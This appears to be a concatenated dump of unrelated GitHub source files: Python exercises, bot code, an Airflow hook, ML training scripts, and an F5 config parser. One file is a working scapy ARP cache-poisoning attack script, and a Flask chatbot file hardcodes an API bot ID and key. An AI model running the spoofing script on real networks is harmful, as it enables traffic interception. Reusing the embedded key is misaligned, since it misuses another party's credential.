0bb5c2d6d7765116dfc6e179cc86266981d8112f | 3cabfd6ad2d1477b579dadb959d74931daf67c3c | /data_structure/sets/12_max_and_min_in_set.py | d20a10a4196f028f4a3f6af8bc0499493de53c1a | [] | no_license | SunnyRaj94/Basic-Python-And-Data-Structures | 1a7100d91d3bbd82157feb7bcbd105c8bc7fd765 | 726c044773a0fe7146356c0bee28805eea6d15e2 | refs/heads/master | 2020-11-25T07:27:47.441078 | 2019-12-21T07:23:39 | 2019-12-21T07:23:39 | 228,556,873 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | """
Created on 13/12/2019
@author: Sunny Raj
"""
"""
problem statement:
Write a Python program to find maximum and the minimum value in a set
"""
#creating sample set
my_set=set({"apple", "banana", "cherry","potato","xyz"})
#finding maximum value from set
maximum_value = max(my_set)
# finding minimum value from set
minimum_value= min(my_set)
#printing maximum value obtained
print(maximum_value)
#printing minimum value obtained
print(minimum_value)
| [
"[email protected]"
] | |
24a26fa415a828860233baf76ad7bf89ad51c567 | 332b5d15535d2286a98b390ed224a233a56634ed | /responses.py | c92fb67e14645f84bca00652dcfcdf136781abda | [] | no_license | sonixboost/zxtelebot | da11ef7795989bb7dd6909a91815c65356ca1c7b | ae00609c65ea5a9260866d69f1caff80f57291ba | refs/heads/main | 2023-04-22T05:08:20.374621 | 2021-05-18T18:09:07 | 2021-05-18T18:09:07 | 368,620,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | from datetime import datetime
def hello():
return "Hello!👋 How are you"
def who():
return "I am ZiXu_bot, created by the awesome ZiXu."
def time():
now = datetime.now()
date_time = now.strftime("Date: %d/%m/%y, Time: %H:%M:%S")
return date_time
def love():
return "I love you baby~~~~~~~~<3"
def response(input_text):
user_message = str(input_text).lower()
responses_dict = {
("hello","hi","sup"):hello,
("who are you", "who are you?"):who,
("time","time?"): time,
("bernice", "baby"): love,
}
def checker(user_message, responses_dict):
for keys in responses_dict.keys():
if user_message in keys:
func = responses_dict.get(keys)
return func()
return False
return checker(user_message, responses_dict) | [
"[email protected]"
] | |
b1ed8994ed68e46f1967482e6b2a55482c7492c3 | a16d190c16781bf4fde5960673d2897e469e0174 | /flink-ai-flow/lib/airflow/airflow/providers/google/cloud/hooks/os_login.py | c7a4234055f6bea72f78ce70789ceabe2f89d609 | [
"Apache-2.0",
"MIT",
"Python-2.0",
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | bgeng777/flink-ai-extended | 742a1bb80d07c090c3ecb960394422896b5899d7 | f83b5d661240c45c767002767c0cbddc847fff81 | refs/heads/master | 2023-08-15T00:32:40.260537 | 2021-07-27T04:20:53 | 2021-07-27T04:20:53 | 349,360,984 | 1 | 2 | Apache-2.0 | 2021-05-20T03:05:56 | 2021-03-19T09:03:50 | Python | UTF-8 | Python | false | false | 3,582 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Dict, Optional, Sequence, Union
from google.cloud.oslogin_v1 import OsLoginServiceClient
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
class OSLoginHook(GoogleBaseHook):
"""
Hook for Google OS login APIs.
All the methods in the hook where project_id is used must be called with
keyword arguments rather than positional.
"""
def __init__(
self,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self._conn = None # type: Optional[OsLoginServiceClient]
def get_conn(self) -> OsLoginServiceClient:
"""Return OS Login service client"""
if self._conn:
return self._conn
self._conn = OsLoginServiceClient(credentials=self._get_credentials(), client_info=self.client_info)
return self._conn
@GoogleBaseHook.fallback_to_default_project_id
def import_ssh_public_key(
self, user: str, ssh_public_key: Dict, project_id: str, retry=None, timeout=None, metadata=None
):
"""
Adds an SSH public key and returns the profile information. Default POSIX
account information is set when no username and UID exist as part of the
login profile.
:param user: The unique ID for the user
:type user: str
:param ssh_public_key: The SSH public key and expiration time.
:type ssh_public_key: dict
:param project_id: The project ID of the Google Cloud project.
:type project_id: str
:param retry: A retry object used to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
:type retry: Optional[google.api_core.retry.Retry]
:param timeout: The amount of time, in seconds, to wait for the request to complete. Note that
if ``retry`` is specified, the timeout applies to each individual attempt.
:type timeout: Optional[float]
:param metadata: Additional metadata that is provided to the method.
:type metadata: Optional[Sequence[Tuple[str, str]]]
:return: A :class:`~google.cloud.oslogin_v1.types.ImportSshPublicKeyResponse` instance.
"""
conn = self.get_conn()
return conn.import_ssh_public_key(
parent=OsLoginServiceClient.user_path(user=user),
ssh_public_key=ssh_public_key,
project_id=project_id,
retry=retry,
timeout=timeout,
metadata=metadata,
)
| [
"[email protected]"
] | |
b52a2f79ce8ccee0bb833b2d3ba50d39c0fa1b60 | bdb1ff6a8cb36f850ea80a91abf9ddbcf2fc23bd | /gild/views.py | f45a754f45abe5afd28b03bb279cbffdabff3151 | [] | no_license | imclab/gild | 8c56d01b9a878dc21c8230089353ab5036a947f4 | 16bee94bb5a476278bb3a8e06e0dbff4975c947f | refs/heads/master | 2020-06-05T00:34:31.568573 | 2014-04-30T15:54:46 | 2014-04-30T15:54:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | # -*- coding: utf-8 -*-
##########################################################################
# Copyright (C) CEA - Neurospin, 2014
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""cubicweb-gild views/forms/actions/components for web ui"""
| [
"[email protected]"
] | |
4de587cab3ba533750991bf0b37d5bde16fce5ee | c62870089bfa398f8b684386f0ae68cc5dcea55d | /exercicios/exe18.py | 106d79caa2e00fc96455a7a6f501d6b71548483a | [] | no_license | GGreenBow/Python-Facul | 828f6d8b5fce46769f47ab49de0da7fbe8422e5c | b9d3d356fdc3881434d52838b158f35f78f2a770 | refs/heads/master | 2023-06-23T00:40:34.318098 | 2021-07-21T17:06:21 | 2021-07-21T17:06:21 | 388,188,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | num=[0]*10
i=0
while (i<10):
num[i]=int(input('Digite um valor: '))
i=i+1
i=9
while (i>=0):
print('%d | ' %num[ind], end="")
i=i-1
| [
"[email protected]"
] | |
ab624a2187ca3b5fce74ed60065aba42b9cacf56 | dea0c71edbb8ca367ac478054d4599b5a42cf518 | /cifar/vgg/thousandtwentyfour/hyper1024.py | e637a77a2200f7875a542802ecb9ce8c1a6cebf2 | [] | no_license | yngtodd/paperspace | a8e394de4782a8f4a2b01c7a33658d9124f16168 | 740bf0290305cca09c385b58a550e0842147c210 | refs/heads/master | 2020-03-08T04:11:18.689813 | 2018-06-30T00:14:21 | 2018-06-30T00:14:21 | 127,914,212 | 0 | 0 | null | 2018-06-27T16:36:25 | 2018-04-03T13:40:05 | Python | UTF-8 | Python | false | false | 4,183 | py | '''Distributed Hyperparameter Optimization of VGG over CIFAR10 with PyTorch.'''
from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import torch.backends.cudnn as cudnn
from utils import get_train_valid_loader
#from model import VGG
from adaptive_model import VGG
from hyperspace import hyperdrive
parser = argparse.ArgumentParser(description='Setup experiment.')
parser.add_argument('--results_dir', type=str, help='Path to results directory.')
parser.add_argument('--use_cuda', type=bool, default=True, help='Whether to use cuda.')
parser.add_argument('--deadline', type=int, default=86400, help='Deadline (seconds) to finish within.')
args = parser.parse_args()
if args.use_cuda == True & torch.cuda.is_available() == False:
print("Cuda not available, using CPU!")
use_cuda = False
else:
use_cuda = True
print("Is cuda available: {}".format(torch.cuda.is_available()))
print("Is the model using cuda: {}".format(use_cuda))
trainloader, validloader = get_train_valid_loader()
classes = ('plane', 'car', 'bird', 'cat', 'deer',
'dog', 'frog', 'horse', 'ship', 'truck')
def objective(params):
kernel1 = int(params[0])
kernel2 = int(params[1])
kernel3 = int(params[2])
kernel4 = int(params[3])
kernel5 = int(params[4])
kernel6 = int(params[5])
kernel7 = int(params[6])
kernel8 = int(params[7])
dropout5 = float(params[8])
dropout6 = float(params[9])
net = VGG(kernel1=kernel1, kernel2=kernel2, kernel3=kernel3,
kernel4=kernel4, kernel5=kernel5, kerenl6=kernel6,
kernel7=kernlel7, kernel8=kernel8, dropout5=dropout5,
dropout6=dropout6)
if use_cuda and torch.cuda.device_count() > 1:
net = nn.DataParallel(net)
net.cuda()
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(net.parameters())
num_epochs = 20
for _ in range(num_epochs):
# Training
net.train()
train_loss = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(trainloader):
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
optimizer.zero_grad()
inputs, targets = Variable(inputs), Variable(targets)
outputs = net(inputs)
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
train_loss += loss.data[0]
_, predicted = torch.max(outputs.data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
#print("Train loss: {}".format(train_loss))
# Validation
net.eval()
val_loss = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(validloader):
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
inputs, targets = Variable(inputs, volatile=True), Variable(targets)
outputs = net(inputs)
loss = criterion(outputs, targets)
val_loss += loss.data[0]
_, predicted = torch.max(outputs.data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
#print("Validation loss: {}".format(val_loss))
#clean up
del inputs, targets
torch.cuda.empty_cache()
return val_loss
def main():
hparams = [(2, 10), # kernel1
(2, 10), # kernel2
(2, 10), # kernel3
(2, 10), # kernel4
(2, 10), # kernel5
(2, 10), # kernel6
(2, 10), # kernel7
(0.25, 0.95), # dropout5
(0.25, 0.95)] # dropout6
hyperdrive(objective=objective,
hyperparameters=hparams,
results_path=args.results_dir,
model="GP",
n_iterations=15,
verbose=True,
sampler="lhs",
n_samples=4,
random_state=0,
deadline=args.deadline)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
94a2319431d5a1836af583129c04d896ed455287 | 5bfa6d39ca5999f24d5c054cf26d4112156d6842 | /Practice/Numpy/Concatenate.py | edc82a12fcea24b32ec3c9ea9c95350a79a2b776 | [] | no_license | CompetitiveCode/hackerrank-python | 3ad7f70f3d09149242b2ab6b27d0e4ec2a188837 | 898e6bf791791cbdeca9192c78c623a115b4c97b | refs/heads/master | 2022-02-03T23:14:57.866923 | 2019-05-30T11:34:01 | 2019-05-30T11:34:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | py | #Answer to Concatenate
import numpy
n,m,p=input().split()
a,b=[],[]
for i in range(int(n)):
a.append(list(map(int,input().split())))
for i in range(int(m)):
b.append(list(map(int,input().split())))
a,b=numpy.array(a),numpy.array(b)
print(numpy.concatenate((a,b),axis=0))
"""
Concatenate
Two or more arrays can be concatenated together using the concatenate function with a tuple of the arrays to be joined:
import numpy
array_1 = numpy.array([1,2,3])
array_2 = numpy.array([4,5,6])
array_3 = numpy.array([7,8,9])
print numpy.concatenate((array_1, array_2, array_3))
#Output
[1 2 3 4 5 6 7 8 9]
If an array has more than one dimension, it is possible to specify the axis along which multiple arrays are concatenated. By default, it is along the first dimension.
import numpy
array_1 = numpy.array([[1,2,3],[0,0,0]])
array_2 = numpy.array([[0,0,0],[7,8,9]])
print numpy.concatenate((array_1, array_2), axis = 1)
#Output
[[1 2 3 0 0 0]
[0 0 0 7 8 9]]
""" | [
"[email protected]"
] | |
0a28b4b247fd117a5d0d5c702b2a3eb2cd5b5ec6 | 5996fef397944db5386726b4132550b78b53d1f3 | /tests/dedupe/test_linker.py | 9b46c4374bd040fcf8c2c1eeb1383c073748fc48 | [
"MIT"
] | permissive | vishalbelsare/followthemoney | 5b38178021d3781f0576b80a9f7d59abd0d59440 | 7b7e8aebd61a59d45986da07c6cdc764573e79a6 | refs/heads/master | 2023-03-15T23:27:12.326274 | 2022-02-03T07:55:39 | 2022-02-03T07:55:39 | 187,406,996 | 0 | 0 | MIT | 2023-03-06T10:58:49 | 2019-05-18T21:28:27 | Python | UTF-8 | Python | false | false | 1,397 | py | from unittest import TestCase
from copy import deepcopy
from followthemoney import model
from followthemoney.dedupe import Linker, Match
SAMPLE = {
"decision": False,
"canonical": {"id": "can", "schema": "Person", "properties": {"name": ["Tom"]}},
"entity": {
"id": "ent",
"schema": "LegalEntity",
"properties": {"name": ["Thomas"]},
},
}
class LinkerTestCase(TestCase):
def test_linker(self):
match = Match(model, deepcopy(SAMPLE))
match.decision = True
passport = model.get_proxy(
{"id": "pass", "schema": "Passport", "properties": {"holder": ["ent"]}}
)
linker = Linker(model)
linker.add(match)
out = linker.apply(match.entity)
assert out.id == "can", out
out = linker.apply(passport)
assert "can" in out.get("holder"), out
assert "ent" not in out.get("holder"), out
def test_linker_noop(self):
match = Match(model, deepcopy(SAMPLE))
passport = model.get_proxy(
{"id": "pass", "schema": "Passport", "properties": {"holder": ["ent"]}}
)
linker = Linker(model)
linker.add(match)
out = linker.apply(match.entity)
assert out.id == "ent", out
out = linker.apply(passport)
assert "ent" in out.get("holder"), out
assert "can" not in out.get("holder"), out
| [
"[email protected]"
] | |
8e08c4149e369c61f69512cf461af1096533371c | 713d349dd0db1f326ee0e5b6e8317ecfe5ad69b5 | /myblog/blog/urls.py | b59694e3eca182829e8a8fb442057151cb435d18 | [] | no_license | miaomiaobupang/Python | 499aab171f9d4fd38320b8b890370eb3f738cc81 | a1e3128ebb8e97765df4434256b18dd72c03a7c6 | refs/heads/master | 2020-03-20T07:38:36.444380 | 2018-06-23T05:17:54 | 2018-06-23T05:17:54 | 137,287,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 447 | py | from django.urls import path
from . import views
app_name = 'blog'
urlpatterns = [
path('index',views.index),
path('article/<int:article_id>/',views.article_page,name='article_page'),
path('edit/<int:article_id>/',views.article_edit,name='article_edit'),
path('add',views.add_page,name='add_page'),
path('create',views.create_page,name='add_action'),
path('action/<int:article_id>/',views.edit_action,name='edit_action')
]
| [
"[email protected]"
] | |
2f058eedc859c6e1bf03f752e6e7186e3d04ef01 | f07b8fa5b644a87469714ed3959a86e00b020d8f | /main.py | 86ea2ab85007326ccfdb295cacad777552a25014 | [] | no_license | UnschooledGamer/alex | 2e0ac30c084cc76ca11b09e8ac251585d6c92a9f | 1a8d0feed79ef2b26ffdf8b87b2aa3853bf22bec | refs/heads/main | 2023-02-01T08:50:01.735352 | 2020-12-19T17:44:18 | 2020-12-19T17:44:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,291 | py | from flask import Flask, render_template, request
from threading import Timer
import webbrowser
import requests
import json
import uuid
import os
app = Flask(__name__)
myBid = "153894" # This value can be changed to use your own bot
myKey = "C8abK8Xqt0iqeEEK" # This value can be changed to use your own bot
#define app routes
@app.route("/")
def index():
return render_template("index.html")
def open_browser():
webbrowser.open_new('http://127.0.0.1:2000/')
def serial_num():
var = str(uuid.uuid1(uuid.getnode(),0))[24:]
try:
username = os.getlogin()
except Exception as e:
print(e)
print("Unable to get username")
username = "Unknown User"
var = var + "+" + username
print(var)
return var
@app.route("/get")
#function for the bot response
def get_bot_response():
userText = request.args.get('msg')
answer = give_answer(userText)
return str(answer)
def give_answer(givenText):
uid = serial_num()
url = "http://api.brainshop.ai/get?bid="+myBid+"&key="+myKey+"&uid="+uid+"&msg="+givenText
response = requests.get(url)
parsed = json.loads(response.text)['cnt']
return parsed
if __name__ == "__main__":
print(serial_num())
Timer(1, open_browser).start();
app.run(port=2000)
| [
"[email protected]"
] | |
7cb79c4d8387b7a7aec5b197792b6b5c4cc69396 | 00df602d82f04b85dde5b0d2f9fb7690e2c3b94c | /main.py | f1f4cbf015e3701fd91a9a10d38a0ce4ab24e0db | [] | no_license | mjavidiq/number-wordify | 2f67a13650ae83b14b7ea0f3f2cf2d0008a6b493 | 65eed390a65fa27e021e5e5d2d6be4a7dfae04ff | refs/heads/master | 2021-10-25T05:20:27.892364 | 2019-04-01T21:41:48 | 2019-04-01T21:41:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | import argparse
from number_to_words import *
from words_to_number import *
from all_wordifications import *
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--number", action = "store",
dest = "number", help = "Find a single wordification of phone number")
parser.add_argument("-w", "--word", action = "store",
dest = "word", help = "Convert wordified number to phone number")
parser.add_argument("-a", "--all", action = "store",
dest = "all", help = "Find all wordifications of phone number")
parser.add_argument("-d", "--dict", action = "store",
dest = "dict", default = "./language/words_alpha.txt",
help = "Specify custom dictionary")
def main(args):
# Wordify a given phone number and print out one wordification
if args.number != None:
w = number_to_words(args.number, args.dict)
print("Wordified number:", w)
return w
# De-wordify a string into the form 1-800-123-4567
if args.word != None:
n = words_to_number(args.word)
print("Number from wordification:", n)
return n
# Wordify a given phone number and int out all possible wordifications
if args.all != None:
all_w = all_wordifications(args.all, args.dict)
print("Found {} wordifications".format(len(all_w)))
for i,w in enumerate(all_w):
print(i+1, w)
return all_w
if __name__ == "__main__":
args = parser.parse_args()
main(args) | [
"[email protected]"
] | |
be4d6e900bc57ce2ac2d93dffe63b33287765b57 | c8f83fae4d09d6129f1531499138d1b72e7a91e6 | /week3/PandaSocialNetwork/pandaSocial.py | 0ed12eacf067bfcc584330350ed82c203abdb094 | [] | no_license | slavyana-monkova/Programming101-3 | 4234ce5c3a0730f816e6bdf688b951a12855e6c3 | d9a89b8c7091553214f817c1bf733171f08ab4dd | refs/heads/master | 2021-05-30T20:12:32.562121 | 2016-03-19T13:47:43 | 2016-03-19T13:47:43 | 36,850,003 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,488 | py | import json
from Panda import Panda2
class PandaSocialNetwork():
def __init__(self):
self.network = {}
def pandas(self):
return self.__pandas
def has_panda(self, panda):
return panda in self.network
def are_friends(self, panda1, panda2):
return panda1 in self.network[panda2] and panda2 in self.network[panda1]
def add_panda(self, panda):
if self.has_panda(panda):
raise Exception('Panda already there')
self.network[panda] = []
def make_friend(self, panda1, panda2):
if not self.has_panda(panda1):
self.add_panda(panda1)
if not self.has_panda(panda2):
self.add_panda(panda2)
if self.are_friends(panda1, panda2):
raise Exception("Panda are already friends")
self.network[panda1].append(panda2)
self.network[panda2].append(panda1)
def friends_of(self, panda):
if panda not in self.network:
raise Exception('pandata ne e tam')
return self.network[panda]
def connection_level(self, panda1, panda2):
if self.friends_of(panda2) == []:
return False
if (panda1 or panda2) not in self.network:
return False
if self.are_friends(panda1, panda2):
return 1
queue = []
path = [panda1]
queue.append(path)
while queue:
path = queue.pop(0)
node = path[-1]
if node == panda2:
return len(path)-1
for adjacent in self.network[node]:
new_path = list(path)
new_path.append(adjacent)
queue.append(new_path)
return -1
def panda_connections(self, panda):
connections = {}
q = []
visited = set()
q.append((0, panda))
visited.add(panda)
while len(q) != 0:
panda_data = q.pop(0)
current_level = panda_data[0]
current_node = panda_data[1]
connections[current_node] = current_level
for neighboor in self.network[current_node]:
if neighboor not in visited:
visited.add(neighboor)
q.append((current_level+1, neighboor))
return connections
def connection_level2(self, panda1, panda2):
panda_table = self.panda_connections(panda1)
if panda2 not in panda_table:
return -1
return panda_table[panda2]
def genders_in_network(self, level, gender, panda):
panda_table = self.panda_connections(panda)
counter = 0
for panda in panda_table:
p_level = panda_table[panda]
if p_level != 0 and p_level <= level and panda.gender() == gender:
counter += 1
return counter
def __repr__(self):
for_save = {}
for panda in self.network:
friends = [repr(panda_friend) for panda_friend in self.network[panda]]
for_save[repr(panda)] = friends
return for_save
def save(self, filename):
with open(filename, "w") as f:
f.write(json.dumps(self.__repr__(), indent=True))
def load(filename):
with open(filename, "r") as f:
contents = f.read()
json_network = json.loads(contents)
network = PandaSocialNetwork()
for panda in json_network:
for friends in json_network[panda]:
p1 = eval(panda)
p2 = eval(friends)
if not network.are_friends(p1, p1):
network.make_friend(p1, p2)
return network
def are_connected(self, panda1, panda2):
if self.connection_level(panda1, panda2) > 0:
return True
return False
def how_many_gender_in_network(level, panda, gender):
pass
network = PandaSocialNetwork()
ivo = Panda2("Ivo", "[email protected]", "male")
rado = Panda2("Rado", "[email protected]", "male")
tony = Panda2("Tony", "[email protected]", "female")
buby = Panda2("bobi", "[email protected]", "female")
for panda in [ivo, rado, tony,buby]:
network.add_panda(panda)
print(network.__dict__)
network.make_friend(ivo, rado)
network.make_friend(rado, tony)
#print(network.connection_level(ivo, tony) == 2)
print(network.connection_level(ivo,buby))
#print(network.are_connected(ivo, rado))
print(network.are_connected(ivo, buby))
| [
"[email protected]"
] | |
99155f8328c039b59341ac316c315a792b8f6555 | 6bc658917b14ca0bcd4900dbdaf0b32bb3e5a829 | /arp_cache_poisoning.py | 831777265e3253a78f5b424b421b1bcbf3f9cdda | [] | no_license | AsherDLL/Sec-tools | 556745925ed1d33c60e8a0ad88245bf91df580fd | 8188fe07df8cba5b9a2435b423bfe8c108b2a95f | refs/heads/master | 2021-07-12T02:25:09.205998 | 2020-05-29T19:00:16 | 2020-05-29T19:00:16 | 144,144,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | #A noisy arp-poisoning attack
#!/usr/bin/python
import sys
import time
from scapy.all import sendp, ARP, Ether
if len(sys.argv) < 3:
print sys.argv[0] + ": <target> <spoof_ip>"
sys.exit(1)
iface = "ens33"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]
ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp
while True:
sendp(packet, iface=iface)
time.sleep(1)
| [
"[email protected]"
] | |
606bd8620f59bf21b2155102fa38a59e4ffe425e | 4842f6eec5257c5546215f84b92c9081fb485dbd | /F5SearchToolFunction/ConfigSearchFunctions.py | e0ade37ca9206ed830d2137b01c30dca313bae30 | [] | no_license | stttt2003pk/stttt2003pk_f5_config_read | 4398764562a69658208198f884e12bca883ee417 | 245f55563d122d5bf42b56e4853f53cb577645db | refs/heads/master | 2021-01-09T06:25:57.984373 | 2017-02-05T13:22:47 | 2017-02-05T13:22:47 | 80,986,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,499 | py | #!/usr/bin/env python
# -*- coding: utf8 -*-
import os, sys
cur_dir = os.path.dirname(os.path.abspath(__file__))
pack_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))
#print pack_dir
if pack_dir:
sys.path.append(pack_dir)
import F5ToolPackage
import re
__author__ = 'stttt2003pk'
'''
make some functions to search the Config more easily
'''
class ConfigSearchFunctions(object):
def __init__(self):
self.__WideIpToGtmPoolV11 = ''
self.__WideIpToServerListV11 = []
self.__IpToVsListV11 = []
self.__VsToHttpClassV11 = None
self.__VsToProfilesV11 = None
self.__VsIpList = []
self.__LtmMonitorList=[]
self.__LtmPoolList=[]
self.__LtmVsList=[]
def SetLtmConfigV11(self, LtmConfigFileNameV11):
self.__LtmConfigV11 = F5ToolPackage.GetF5V11LtmConfig(LtmConfigFileNameV11)
def SetGtmConfigV11(self, GtmConfigFileNameV11):
self.__GtmConfigV11 = F5ToolPackage.GetF5V11GtmConfig(GtmConfigFileNameV11)
def SetGtmConfigV10(self, GtmConfigFileNameV10):
self.__GtmConfigV10 = F5ToolPackage.GetF5V10GtmConfig(GtmConfigFileNameV10)
@property
def VsSet(self):
return self.__LtmConfigV11.VsSet
@property
def LtmConfigV11(self):
return self.__LtmConfigV11
@property
def LtmPoolSet(self):
return self.__LtmConfigV11.LtmPoolSet
@property
def MemberSet(self):
return self.__LtmConfigV11.MemberSet
@property
def MonitorSet(self):
return self.__LtmConfigV11.MonitorSet
@property
def GtmSetV11(self):
return self.__GtmConfigV11.GtmSet
@property
def GtmServerSetV11(self):
return self.__GtmConfigV11.GtmServerSet
@property
def GtmPoolSetV11(self):
return self.__GtmConfigV11.GtmPoolSet
@property
def GtmSetV10(self):
return self.__GtmConfigV10.GtmSet
@property
def GtmServerSetV10(self):
return self.__GtmConfigV10.GtmServerSet
@property
def GtmPoolSetV10(self):
return self.__GtmConfigV10.GtmPoolSet
def GetWideIpToGtmPoolV11(self, WideIp):
return self.__SearchWideIpToGtmPoolV11(WideIp)
def GetWideIpToServerListV11(self, WideIp):
return self.__SearchWideipToSeverListV11(WideIp)
def GetIpToVsListV11(self, AIp):
return self.__SearchIpToVsV11(AIp)
def GetVsToHttpClassV11(self, Vs):
return self.__SearchVsToHttpClassV11(Vs)
def GetVsToProfilesV11(self, Vs):
return self.__SearchVsToProfilesV11(Vs)
def GetVsToPoolName(self, Vs):
return self.__SearchVsToPoolName(Vs)
def GetLtmPoolNameToPoolMembersList(self, LtmPoolName):
return self.__SearchLtmPoolNameToPoolMembersList(LtmPoolName)
def GetVsIpList(self):
return self.__SearchVsIpListV11()
def GetIpToGtmServer(self, AIp):
return self.__SearchIpToGtmServer(AIp)
def GetGtmServerNameToGtmPoolList(self, ServerName):
return self.__SearchGtmServerNameToGtmPoolList(ServerName)
def GetGtmPoolListToGtmWideipList(self, GtmPoolNameList):
return self.__SearchGtmPoolListToGtmWideipList(GtmPoolNameList)
def GetIpToVsZero(self, Ip):
return self.__SearchIpToVsZero(Ip)
@property
def GetMonitorList(self):
for key,value in self.__LtmConfigV11.MonitorSet.items():
if key.find('-name') == -1:
continue
else:
self.__LtmMonitorList.append(value)
continue
return self.__LtmMonitorList
@property
def GetPoolList(self):
for key,value in self.__LtmConfigV11.LtmPoolSet.items():
if key.find('-name') == -1:
continue
else:
self.__LtmPoolList.append(value)
continue
return set(self.__LtmPoolList)
@property
def GetVsList(self):
for key,value in self.__LtmConfigV11.VsSet.items():
if key.find('-name') == -1:
continue
else:
self.__LtmVsList.append(value)
continue
return set(self.__LtmVsList)
####input an WideIp,find out Gtm Pool
def __SearchWideIpToGtmPoolV11(self, WideIp):
WideIpPool = WideIp + '-wideippool'
return self.__GtmConfigV11.GtmSet.get(WideIpPool, None)
####input an WideIp, Find out Gtm Servers
def __SearchWideipToSeverListV11(self, WideIp):
GtmPoolName = self.__SearchWideIpToGtmPoolV11(WideIp)
return self.__GtmConfigV11.GtmPoolSet.get(GtmPoolName, None)
####input an IP or A record , Find out the VSs
def __SearchIpToVsV11(self, AIp):
VsList = []
VsSet = self.__LtmConfigV11.VsSet
VsSetList = self.__LtmConfigV11.VsSet.items()
for (keys, value) in VsSetList:
if keys.find('-ip') == -1:
continue
else:
if value == AIp:
str = keys.split('-ip')[0] + '-port'
VsList.append(keys.split('-ip')[0] + ':' + VsSet.get(str, None))
return VsList
####input an VS name,output this VS s http-class
def __SearchVsToHttpClassV11(self, Vs):
GetVsHttpClassStr = Vs + '-http-class'
return self.__LtmConfigV11.VsSet.get(GetVsHttpClassStr, None)
####input an Vs name, outpu this Vs s profiles
def __SearchVsToProfilesV11(self, Vs):
GetVsProfilesStr = Vs + '-profile'
return self.__LtmConfigV11.VsSet.get(GetVsProfilesStr, None)
####input an Vs name, output this Vs s pool
def __SearchVsToPoolName(self, Vs):
GetVsPoolStr = Vs + '-pool'
return self.__LtmConfigV11.VsSet.get(GetVsPoolStr, None)
####input an pool name, output this pool members list
def __SearchLtmPoolNameToPoolMembersList(self, LtmPoolName):
return self.__LtmConfigV11.LtmPoolSet.get(LtmPoolName, None)
####get all vs ip from bigip.conf
def __SearchVsIpListV11(self):
VsIpList = []
VsSet = self.__LtmConfigV11.VsSet
VsSetList = VsSet.items()
for (keys, value) in VsSetList:
if keys.find('-ip') == -1:
continue
else:
#print F5ToolPackage.GetF5V11LtmConfig(LtmConfigFileNameV11).VsSet.get(keys, None)
VsIpList.append(VsSet.get(keys, None))
return list(set(VsIpList))
####input an IP, find out gtm server name
def __SearchIpToGtmServer(self, AIp):
GtmServerName = ''
GtmServerSetV11List = self.__GtmConfigV11.GtmServerSet.items()
GtmServerSetV10List = self.__GtmConfigV10.GtmServerSet.items()
for (keys, value) in GtmServerSetV10List:
if keys.find('-ip') == -1:
continue
else:
if value == AIp:
GtmServerName = AIp
for (keys, value) in GtmServerSetV11List:
if keys.find('-ip') == -1:
continue
else:
if value == AIp:
GtmServerName = keys.split('-ip')[0]
return GtmServerName
####search servername to gtm pool, using gtmpool as [], because a gtm server can be attached to multiply gtm pool
def __SearchGtmServerNameToGtmPoolList(self, ServerName):
WideIpPoolNanme = []
GtmPoolSetV10List = self.__GtmConfigV10.GtmPoolSet.items()
GtmPoolSetV11List = self.__GtmConfigV11.GtmPoolSet.items()
if re.match(r"^\d+\.\d+\.\d+\.\d+$", ServerName):
for (keys, value) in GtmPoolSetV10List:
for PoolIP in value:
if PoolIP == ServerName:
WideIpPoolNanme.append(keys)
else:
for (keys, value) in GtmPoolSetV11List:
for MemberName in value:
if MemberName == ServerName:
WideIpPoolNanme.append(keys)
WideIpPoolNanme = list(set(WideIpPoolNanme))
return WideIpPoolNanme
def __SearchGtmPoolListToGtmWideipList(self, GtmPoolNameList):
WideipName = []
GtmWideipSetV10List = self.__GtmConfigV10.GtmSet.items()
